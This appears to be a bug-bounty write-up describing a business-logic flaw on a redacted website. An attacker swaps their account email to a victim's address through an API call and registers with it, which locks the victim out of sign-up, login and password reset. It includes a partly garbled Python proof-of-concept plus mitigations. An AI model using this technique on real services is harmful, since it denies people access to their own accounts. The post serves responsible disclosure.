Unauthorized Email Address Change Blocks User Account Access — $200

3 min readOct 11


Greetings to the vigilant online community,

Today, I am excited to share my journey of discovery, where I unveiled a critical security vulnerability on the Redacted website. This story showcases the power of responsible disclosure and how I came across an issue that could potentially affect users’ accounts.

The vulnerability I uncovered allows malevolent actors to prevent legitimate users from creating an account, logging in, or resetting their passwords. It involves a lapse in business logic, enabling attackers to manipulate the system to obstruct legitimate users from accessing their own accounts.

Let’s break down how this vulnerability operates:

  1. Attacker Updates Victim’s Email Address: The attacker uses an API endpoint to change a victim’s email address to their own, using the victim’s known email address.
  2. Attacker Attempts to Create Victim’s Account: The attacker initiates an account creation process using the victim’s email address, which was altered in step 1. The (Private Program) system fails to create the user’s profile, detecting a conflicting email address.
  3. Attacker Reverts Their Own Email Address: To avoid locking themselves out, the attacker restores their own email address using a similar API request as in step 1, with their own email address.

For a visual understanding, here's a Proof-of-Concept (POC) code snippet:

import requests
import json

auth_token='authentication_token from cookie' #attacker auth token
remember_token= auth_token

#attacker id (personId)
attacker_id='attacker personal profile id (personId)'

#attacker email
attacker_email='attacker email'

def update_email(email):
url = f"https://www.redacted.com/api/v3/people/{attacker_id}"
headers = {
"Host": "www.redacted.com",
"Cookie": f"authentication_token={auth_token}; remember_token={remember_token}",
"Content-Length": "70",
data = {
"person": {
"email": email,
"profile": {"customer": {}}
response = requests.put(url, headers=headers, json=data)
return response

def create_account(email):
url = "https://www.redacted.com/register/"
headers = {
"Host": "www.redacted.com",
"Content-Type": "application/json",
"Content-Length": "113",
data = {
"returnPerson": True,
"first": email,
"last": email,
"password": email,
"email": email
response = requests.post(url, headers=headers, json=data)
return response

email = input("Enter an email address: ")




print("Now User Can't Create Or Login Into His Account")

The Impact

The repercussions of this vulnerability are significant:

  • Blocking Victim’s Account: The victim is effectively locked out of their own account, with the attacker altering their email address and preventing the creation of their user profile.
  • Inability to Create an Account: Legitimate users cannot create a new account using their email address, as the system recognizes the email as already in use.
  • Preventing Sign-In: Legitimate users cannot sign in, as their user profile was not successfully created.
  • Disabling Password Reset: Even if a victim attempts to reset their password, it won’t work as their email address is no longer associated with a valid user profile.

Recommendations for Mitigation

To mitigate this vulnerability and prevent similar incidents in the future, I recommend the following actions:

  • Strengthen business logic to ensure user profiles are created only for successfully registered users.
  • Implement stronger email address validation and authorization checks when updating email addresses.
  • Add additional security layers for account creation and password reset processes.
  • Implement mechanisms to prevent attackers from changing legitimate users’ email addresses.
  • Provide proper monitoring and alerting systems for suspicious activities on user accounts.

Responsible Disclosure

As responsible security researchers, it is our duty to report such vulnerabilities to the relevant parties. I promptly reported this critical security flaw to the Private Program team through HackerOne, a platform that facilitates responsible disclosure. In recognition of my efforts, I was awarded a $200 bounty.

Let’s keep the internet secure, one discovery at a time!




I am a Full Stack Developer 👩‍💻 | Security Researcher 📖 | Open Source Lover ❤ | Bug Hunter🐞| Penetration Tester💻